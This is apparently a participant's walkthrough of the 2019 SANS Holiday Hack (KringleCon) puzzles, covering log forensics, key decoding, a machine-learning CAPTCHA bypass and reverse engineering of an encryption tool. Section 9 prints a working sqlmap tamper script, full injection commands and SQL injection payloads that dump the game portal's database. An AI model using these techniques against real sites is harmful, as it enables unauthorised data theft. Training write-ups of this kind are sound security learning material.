# 0) Talk to Santa in the Quad

> Enter the campus quad and talk to Santa.

Just talk to Santa.

# 1) Find the Turtle Doves

> Find the missing turtle doves.

They're in the Student Union area.

# 2) Unredact Threatening Document

> Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.

The letter is located in the top-left corner of the Quad. When you click on it, https://downloads.elfu.org/LetterToElfUPersonnel.pdf opens.

Most parts of the [LetterToElfUPersonnel.pdf](2_Unredact_Threatening_Document/LetterToElfUPersonnel.pdf) is redacted:

![Redacted letter to Elf U personnel](2_Unredact_Threatening_Document/LetterToElfUPersonnel.png "Redacted letter to Elf U personnel")

To reveal it, just copy the text and paste in text editor:

```
Date: February 28, 2019

To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole

From: A Concerned and Aggrieved Character

Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!


Attention All Elf University Personnel,

It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.

For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.

If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.

Sincerely,

--A Concerned and Aggrieved Character 
```

**Answer: DEMAND**

# 3) Windows Log Analysis: Evaluate Attack Outcome

> We're seeing attacks against the Elf U domain! Using the [event log data](https://downloads.elfu.org/Security.evtx.zip), identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.

The zip file contains `.evtx` file. It's binary file, but we can use [python-evtx](https://github.com/williballenthin/python-evtx) to parse it and convert to XML. The file contains the list of events:

```xml
Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"/>
<EventID Qualifiers="">4625</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12544</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2019-11-19 12:21:59.486814"/>
<EventRecordID>90959</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""/>
<Execution ProcessID="632" ThreadID="3640"/>
<Channel>Security</Channel>
<Computer>DC1.elfu.org</Computer>
<Security UserID=""/>
</System>
<EventData><Data Name="SubjectUserSid">S-1-0-0</Data>
<Data Name="SubjectUserName">-</Data>
<Data Name="SubjectDomainName">-</Data>
<Data Name="SubjectLogonId">0x0000000000000000</Data>
<Data Name="TargetUserSid">S-1-0-0</Data>
<Data Name="TargetUserName">tcandybaubles</Data>
<Data Name="TargetDomainName">ELFU</Data>
<Data Name="Status">0xc000006d</Data>
<Data Name="FailureReason">%%2313</Data>
<Data Name="SubStatus">0xc000006a</Data>
<Data Name="LogonType">3</Data>
<Data Name="LogonProcessName">NtLmSsp </Data>
<Data Name="AuthenticationPackageName">NTLM</Data>
<Data Name="WorkstationName">DC1</Data>
<Data Name="TransmittedServices">-</Data>
<Data Name="LmPackageName">-</Data>
<Data Name="KeyLength">0</Data>
<Data Name="ProcessId">0x0000000000000000</Data>
<Data Name="ProcessName">-</Data>
<Data Name="IpAddress">127.0.0.1</Data>
<Data Name="IpPort">52957</Data>
</EventData>
</Event>
```

We focus on events for successful and unsuccessful login attempts, i.e. events with `EventId` `4624` and `4625`.

The attacker used password spray technique, it means that he tried to login to various accounts using the short list of passwords. We can find the attacker's IP address by counting the unsuccessful login attempt events for individual IP address. The IP address with the highest number of unsuccessful login attempts is attacker's IP address. In our case it's `127.0.0.1`.

Then, we find the successful login attempt event with the attacker's IP address. The `TargetUserName` of this event is the answer.

The python script that solves this: [solve.py](3_Windows_Log_Analysis_Evaluate_Attack_Outcome/solve.py).

**Answer: supatree**

# 4) Windows Log Analysis: Determine Attacker Technique

> Using these [normalized Sysmon logs](https://downloads.elfu.org/sysmon-data.json.zip), identify the tool the attacker used to retrieve domain password hashes from the `lsass.exe` process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.

The zip file contains [sysmon-data.json](4_Windows_Log_Analysis_Determine_Attacker_Technique/sysmon-data.json). There's one entry for `lsass.exe`:

```json
{
        "command_line": "C:\\Windows\\system32\\cmd.exe",
        "event_type": "process",
        "logon_id": 999,
        "parent_process_name": "lsass.exe",
        "parent_process_path": "C:\\Windows\\System32\\lsass.exe",
        "pid": 3440,
        "ppid": 632,
        "process_name": "cmd.exe",
        "process_path": "C:\\Windows\\System32\\cmd.exe",
        "subtype": "create",
        "timestamp": 132186398356220000,
        "unique_pid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
        "unique_ppid": "{7431d376-cd7f-5dd3-0000-001013920000}",
        "user": "NT AUTHORITY\\SYSTEM",
        "user_domain": "NT AUTHORITY",
        "user_name": "SYSTEM"
    }
```

As we can see, `lsass.exe` is the parent process of `cmd.exe`, which has PID `3440`, which has only one child process (`"ppid": 3440`):

```json
{
        "command_line": "ntdsutil.exe  \"ac i ntds\" ifm \"create full c:\\hive\" q q",
        "event_type": "process",
        "logon_id": 999,
        "parent_process_name": "cmd.exe",
        "parent_process_path": "C:\\Windows\\System32\\cmd.exe",
        "pid": 3556,
        "ppid": 3440,
        "process_name": "ntdsutil.exe",
        "process_path": "C:\\Windows\\System32\\ntdsutil.exe",
        "subtype": "create",
        "timestamp": 132186398470300000,
        "unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
        "unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
        "user": "NT AUTHORITY\\SYSTEM",
        "user_domain": "NT AUTHORITY",
        "user_name": "SYSTEM"
    }
```
The tool used to retrieve password hashes was `ntdsutil`.

**Answer: ntdsutil**

# 5) Network Log Analysis: Determine Compromised System

> The attacks don't stop! Can you help identify the IP address of the malware-infected system using these [Zeek logs](https://downloads.elfu.org/elfu-zeeklogs.zip)? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.

We can use [RITA](https://github.com/activecm/rita) to solve this. Import the logs and print hosts which show signs of C2 software (`show-beacons`):

```
$ rita import /logs elfu-zeeklogs
    [+] Importing [/logs]:
    [-] Verifying log files have not been previously parsed into the target dataset ... 
    [-] Parsing logs to: elfu-zeeklogs ... 
    [-] Parsing /logs/conn.log-00002_20190823121227.log -> elfu-zeeklogs
    [...]
$ rita how-beacons elfu-zeeklogs
Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top Intvl,Top Size,Top Intvl Count,Top Size Count,Intvl Skew,Size Skew,Intvl Dispersion,Size Dispersion
0.998,192.168.134.130,144.202.46.214,7660,1156,10,683,10,563,6926,7641,0,0,0,0
```

**Answer: 192.168.134.130**

# 6) Splunk

> Access https://splunk.elfu.org/ as `elf` with password `elfsocks`. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.

Answers to training questions:

*1. What is the short host name of Professor Banas' computer?*

`sweetums`

*2. What is the name of the sensitive file that was likely accessed and copied by the attacker? Please provide the fully qualified location of the file. (Example: C:\temp\report.pdf)*

`C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt`

*3. What is the fully-qualified domain name(FQDN) of the command and control(C2) server? (Example: badguy.baddies.com)*

`144.202.46.214.vultr.com`

*4. What document is involved with launching the malicious PowerShell code? Please provide just the filename. (Example: results.txt)*

`19th Century Holiday Cheer Assignment.docm`

*5. How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? Please provide the numeric value. (Example: 1)*

`21`

*6. What was the password for the zip archive that contained the suspicious file?*

`123456789`

*7. What email address did the suspicious file come from?*

`bradly.buttercups@eifu.org`

To answer the challenge question, we need to look at the malicious Word document's properties. The actual files are present in raw stoQ files. We can use Splunk to find out the stoQ file path - it's `/home/ubuntu/archive/c/6/e/1/7/c6e175f5b8048c771b3a3fac5f3295d2032524af`:

```
Cleaned for your safety. Happy Holidays!
 
 In the real world, This would have been a wonderful artifact for you to investigate, but it had malware in it of course so it's not posted here. Fear not! The core.xml file that was a component of  this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-)
```

Ok, so we need to look at `core.xml` file - it's in `/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4`:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <dc:title>Holiday Cheer Assignment</dc:title>
    <dc:subject>19th Century Cheer</dc:subject>
    <dc:creator>Bradly Buttercups</dc:creator>
    <cp:keywords></cp:keywords>
    <dc:description>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</dc:description>
    <cp:lastModifiedBy>Tim Edwards</cp:lastModifiedBy>
    <cp:revision>4</cp:revision>
    <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-19T14:54:00Z</dcterms:created>
    <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-19T17:50:00Z</dcterms:modified>
    <cp:category></cp:category>
</cp:coreProperties>
```

**Answer: Kent you are so unfair. And we were going to make you the king of the Winter Carnival.**

# 7) Get Access To The Steam Tunnels

> Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty's dorm room and talk with Minty Candy Cane.

First we need to find the key. The guy with Santa hat hanging around in the Minty's Dorm Room has it.

We can get a high res picture of him by checking Networking tab in Chrome Dev Tools: https://2019.kringlecon.com/images/avatars/elves/krampus.png:

![Krampus with the key](7_Get_Access_To_The_Steam_Tunnels/krampus.png "Krampus with the key")

Then we need to extract the key and rotate it horizontally:

![Key](7_Get_Access_To_The_Steam_Tunnels/key.png "Key")

[This picture](https://github.com/deviantollam/decoding/blob/master/Key%20Measurments/Key%20Measurments%20-%20Schlage.png) provides the information about the dimensions of the key:

![Key Measurements - Schlange](https://github.com/deviantollam/decoding/raw/master/Key%20Measurments/Key%20Measurments%20-%20Schlage.png "Key Measurements - Schlange")

Our picture is in different scale, so we need to calculate the ratio. We know that the key hight should be `880`. On our picture, it's `29` pixels. The ratio is `880/29=30.3448`.

Now we can meaure the heights of individual pins and knowing the ratio, map to the correct bitting number. The results are below:

Cut # | Height (px) | Height | Bitting # |
------|-------------|--------|-----------|
1     | 27          | 819    | 1         |
2     | 26          | 789    | 2         |
3     | 26          | 789    | 2         |
4     | 22          | 668    | 5         |
5     | 26          | 789    | 2         |
6     | 28          | 850    | 0         |

Now we can use `1 2 2 5 2 0` to cut the correct key, open the door and enter Steam Tunnels. Talk to Krampus and find out that he took the turtle doves.

**Answer: Krampus Hollyfeld**

# 8) Bypassing the Frido Sleigh CAPTEHA

> Help Krampus beat the [Frido Sleigh contest](https://fridosleigh.com/). For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

We've got `capteha_api.py` script (we need to complete it) and some training images. We need to use ML to bypass the CAPTEHA.

To solve this, we can re-use the code from this project: [https://github.com/chrisjd20/img_rec_tf_ml_demo](https://github.com/chrisjd20/img_rec_tf_ml_demo).

First, we need to train our algorithm. For this, we need to execute [retrain.py](https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py) on our training images:

```
$ python3 retrain.py --image_dir capteha_images
```

Then, we need to attach ML into `capteha_api.py` (based on [predict_images_using_trained_model.py](https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/predict_images_using_trained_model.py):

```python
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def predict_image(q, sess, image_base64, uuid, labels, input_operation, output_operation):
    image_bytes = base64.b64decode(image_base64)
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put({'uuid': uuid, 'predicted_type': labels[prediction].title()})

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def main():
    [...]

    graph = load_graph('output_graph.pb')
    labels = load_labels("output_labels.txt")

    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)
    
    q = queue.Queue(len(b64_images))
    for image in b64_images:
        print('Processing ' + image['base64'][:100])
        threading.Thread(target=predict_image, args=(q, sess, image['base64'], image['uuid'], labels, input_operation, output_operation)).start()
    
    print('Waiting For Threads to Finish...')
    while not q.full():
        time.sleep(0.001)
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    results_from_queue = [q.get() for x in range(q.qsize())]
    final_answer = ','.join([item['uuid'] for item in results_from_queue if item['predicted_type'] in challenge_image_types])
```

Full code is available [here](8_Bypassing_the_Frido_Sleigh_CAPTEHA/capteha_api.py).

Once we run this script (and it successfully bypas CAPTEHA), we receive an email with the code to the given email address:

> **Congratulations you have been selected as a winner of Frido Sleigh's Continuous Cookie Contest!**
>
> To receive your reward, simply attend KringleCon at Elf University and submit the following code in your badge:
> 
> `8Ia8LiZEwvyZr2WO`
>
> Congratulations,
>
> The Frido Sleigh Team

**Answer: 8Ia8LiZEwvyZr2WO**

# 9) Retrieve Scraps of Paper from Server

> Gain access to the data on the [Student Portal](https://studentportal.elfu.org/) server and retrieve the paper scraps hosted there. What is the name of Santa's cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

The hints indicate that this can be solved by exploiting SQL injection vulnerability on Student Portal web site. And indeed, the application form is vulnerable.

![Application form](9_Retrieve_Scraps_of_Paper_from_Server/application_form.png "Application form")

![SQL syntaxt error](9_Retrieve_Scraps_of_Paper_from_Server/SQL_syntax_error.png "SQL syntax error")

But we can't just use `sqlmap` to exploit it. A random token, which is retrieved from `/validator.php` is added to `POST` request as a parameter:

```javascript
function submitApplication() {
  console.log("Submitting");
  elfSign();
  document.getElementById("apply").submit();
}
function elfSign() {
  var s = document.getElementById("token");

  const Http = new XMLHttpRequest();
  const url='/validator.php';
  Http.open("GET", url, false);
  Http.send(null);

  if (Http.status === 200) {
    console.log(Http.responseText);
    s.value = Http.responseText;
  }
}
```

To be able to use `sqlmap`, we need to write custom tamper script, which will fetch the token from `/validator.php` and append it as a `POST` parameter:

```python
#!/usr/bin/env python
 
from lib.core.enums import PRIORITY
from pprint import pprint
import requests
import urllib.parse
 
__priority__ = PRIORITY.HIGHEST
 
def dependencies():
    pass
 
def tamper(payload, **kwargs):
    headers = kwargs.get('headers', {})
    headers['Content-Type'] = 'application/x-www-form-urlencoded'

    token = requests.get('https://studentportal.elfu.org/validator.php').text.strip()

    return '{}&token={}'.format(urllib.parse.quote(payload), urllib.parse.quote(token))
```

We also need to run `sqlmap` with `--skip-urlencode` parameter, otherwise `sqlmap` would URL-encode the `&` sign that we add to insert `token` parameter in our tamper script. This, however, causes another problem. `sqlmap` sets the `Content-Type` header to `text/plain`, but it must be `application/x-www-form-urlencoded`. To solve this issue, we add correct `Content-Type` header in our custom tamper script.

Having the tamper script, we can use `sqlmap` to find the suitable SQL injection technique:

```
$ ./sqlmap.py -u https://studentportal.elfu.org/application-received.php --tamper=update_token.py --data 'name=name&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay' -p name --skip-urlencode
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.12.29#dev}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:46:27 /2019-12-24/

[13:46:27] [INFO] loading tamper module 'update_token'
[13:46:28] [INFO] testing connection to the target URL
[13:46:28] [INFO] testing if the target URL content is stable
[13:46:29] [INFO] target URL content is stable
[13:46:30] [INFO] heuristic (basic) test shows that POST parameter 'name' might be injectable (possible DBMS: 'MySQL')
[13:46:31] [INFO] heuristic (XSS) test shows that POST parameter 'name' might be vulnerable to cross-site scripting (XSS) attacks
[13:46:31] [INFO] testing for SQL injection on POST parameter 'name'
[13:46:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'ing provided level (1) and risk (1) values? [Y/n] 
[13:46:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:46:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:47:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:48:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:49:23] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:50:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[13:52:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[13:53:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[13:55:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[13:56:51] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[13:58:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[13:59:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[13:59:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[13:59:57] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[14:00:00] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[14:00:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[14:00:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[14:00:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[14:00:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[14:00:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[14:00:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[14:00:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[14:01:13] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[14:01:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:02:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:03:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:04:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:05:18] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:06:19] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:07:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:07:51] [INFO] POST parameter 'name' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:07:51] [INFO] testing 'MySQL inline queries'
[14:07:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:07:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[14:07:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[14:07:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[14:07:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:07:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:07:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:08:06] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[14:08:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[14:08:06] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 1084 HTTP(s) requests:
---
Parameter: name (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=name'||(SELECT 0x766d5876 WHERE 2938=2938 AND (SELECT 7403 FROM(SELECT COUNT(*),CONCAT(0x717a6a6271,(SELECT (ELT(7403=7403,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=name'||(SELECT 0x51577158 WHERE 4611=4611 AND (SELECT 4952 FROM (SELECT(SLEEP(5)))XSHN))||'&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay
---
[14:08:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:08:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
```

The back-end DBMS is MySQL and 2 exploitation techniques are present: error-based and time-based blind.

Let's first list the databases:

```
$ ./sqlmap.py -u https://studentportal.elfu.org/application-received.php --tamper=update_token.py --data 'name=name&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay' -p name --skip-urlencode --dbs
[...]
[14:19:33] [INFO] fetching database names
[14:19:34] [INFO] used SQL query returns 2 entries
[14:19:34] [INFO] resumed: 'elfu'
[14:19:34] [INFO] resumed: 'information_schema'
available databases [2]:
[*] elfu
[*] information_schema
```

`elfu` DB seems interesting. Let's list its tables:

```
$ ./sqlmap.py -u https://studentportal.elfu.org/application-received.php --tamper=update_token.py --data 'name=name&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay' -p name --skip-urlencode --tables -D elfu
[...]
[14:20:24] [INFO] fetching tables for database: 'elfu'
[14:20:27] [INFO] used SQL query returns 3 entries
[14:20:28] [INFO] retrieved: 'applications'
[14:20:29] [INFO] retrieved: 'krampus'
[14:20:30] [INFO] retrieved: 'students'
Database: elfu
[3 tables]
+--------------+
| applications |
| krampus      |
| students     |
+--------------+
```

Let's dump the `krampus` table:

```
$ ./sqlmap.py -u https://studentportal.elfu.org/application-received.php --tamper=update_token.py --data 'name=name&elfmail=mail@gmail.com&program=program&phone=123456789&whyme=whyme&essay=essay' -p name --skip-urlencode --dump -D elfu -T krampus
[...]
[14:21:06] [INFO] fetching columns for table 'krampus' in database 'elfu'
[14:21:07] [INFO] used SQL query returns 2 entries
[14:21:07] [INFO] resumed: 'id'
[14:21:07] [INFO] resumed: 'int(11)'
[14:21:07] [INFO] resumed: 'path'
[14:21:07] [INFO] resumed: 'varchar(30)'
[14:21:07] [INFO] fetching entries for table 'krampus' in database 'elfu'
[14:21:07] [INFO] used SQL query returns 6 entries
[14:21:07] [INFO] resumed: '/krampus/0f5f510e.png'
[14:21:07] [INFO] resumed: '1'
[14:21:07] [INFO] resumed: '/krampus/1cc7e121.png'
[14:21:07] [INFO] resumed: '2'
[14:21:07] [INFO] resumed: '/krampus/439f15e6.png'
[14:21:07] [INFO] resumed: '3'
[14:21:07] [INFO] resumed: '/krampus/667d6896.png'
[14:21:07] [INFO] resumed: '4'
[14:21:07] [INFO] resumed: '/krampus/adb798ca.png'
[14:21:07] [INFO] resumed: '5'
[14:21:07] [INFO] resumed: '/krampus/ba417715.png'
[14:21:07] [INFO] resumed: '6'
Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+
```

We have the image files' paths (probably the paper scraps). Let's retrieve them:

```bash
for img in /krampus/0f5f510e.png /krampus/1cc7e121.png /krampus/439f15e6.png /krampus/667d6896.png /krampus/adb798ca.png /krampus/ba417715.png; do wget https://studentportal.elfu.org/$img; done
```

Let's put them together using GIMP. The resulting page is:

![Letter](9_Retrieve_Scraps_of_Paper_from_Server/letter.png "Letter")

**Answer: Super Sled-o-matic**

# 10) Recover Cleartext Document

> The [Elfscrow Crypto](https://downloads.elfu.org/elfscrow.exe) tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can't send you the source, but we do have [debug symbols](https://downloads.elfu.org/elfscrow.pdb) that you can use.
> 
> Recover the plaintext content for this [encrypted document](https://downloads.elfu.org/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc). We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.
>
> What is the middle line on the cover page? (Hint: it's five words)
>
> For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.

We have encrypted document ([ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc](10_Recover_Cleartext_Document/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc)) and the binary program that was used to encrypt it ([elfscrow.exe](10_Recover_Cleartext_Document/elfscrow.exe)). We have to decrypt the document.

First, we have to reverse engineer the program to figure out what is the encryption algorithm and how the key was calculated.

Decompiled and tidy up encryption function looks like this:

```c
void __cdecl do_encrypt(int param_1,LPCSTR input_file_name,LPCSTR output_file_name)

{
  void *input_file_contents;
  BOOL BVar1;
  FILE *pFVar2;
  char *_Format;
  BYTE *buf;
  BYTE local_30;
  undefined local_2f;
  undefined2 local_2e;
  undefined4 local_2c;
  undefined4 local_28;
  undefined4 local_24;
  undefined4 local_20;
  undefined4 key_buf;
  undefined4 local_18;
  uint local_14;
  HCRYPTPROV crypto_provider;
  HCRYPTKEY key_handle;
  DWORD input_file_len;
  
  // Read file to encrypt
  input_file_contents = read_file(input_file_name,&input_file_len);
  buf = (BYTE *)realloc(input_file_contents,input_file_len + 0x10);
  
  // Initialize crypto context
  BVar1 = CryptAcquireContextA
                    (&crypto_provider,(LPCSTR)0x0,"Microsoft Enhanced Cryptographic Provider v1.0",1
                     ,0xf0000000);
  if (BVar1 == 0) {
    fatal_error("CryptAcquireContext failed");
  }
  
  // Generate key and use it
  generate_key((int)&key_buf);
  print_hex("Generated an encryption key",(int)&key_buf,8);
  local_30 = '\b';    // PLAINTEXTKEYBLOB
  local_2f = 2;       // Version
  local_2e = 0;       // Reserved
  local_2c = 0x6601;  // CALG_DES (DES algorithm)
  local_28 = 8;       // Key length (8)
  local_24 = key_buf; // Key
  local_20 = local_18;
  BVar1 = CryptImportKey(crypto_provider,&local_30,0x14,0,1,&key_handle);
  if (BVar1 == 0) {
    fatal_error("CryptImportKey failed for DES-CBC key");
  }
  
  // Encrypt the document
  BVar1 = CryptEncrypt(key_handle,0,1,0,buf,&input_file_len,input_file_len + 8);
  if (BVar1 == 0) {
    fatal_error("CryptEncrypt failed");
    exit(1);
  }
  
  // Save the key
  store_key(param_1,(int)&key_buf);
  _Format = "File successfully encrypted!\n";
  
  // Printing results (truncated)
  
  // Save encrypted file
  write_file(output_file_name,buf,input_file_len);
  free(buf);
  security_check_cookie();
  return;
}
```

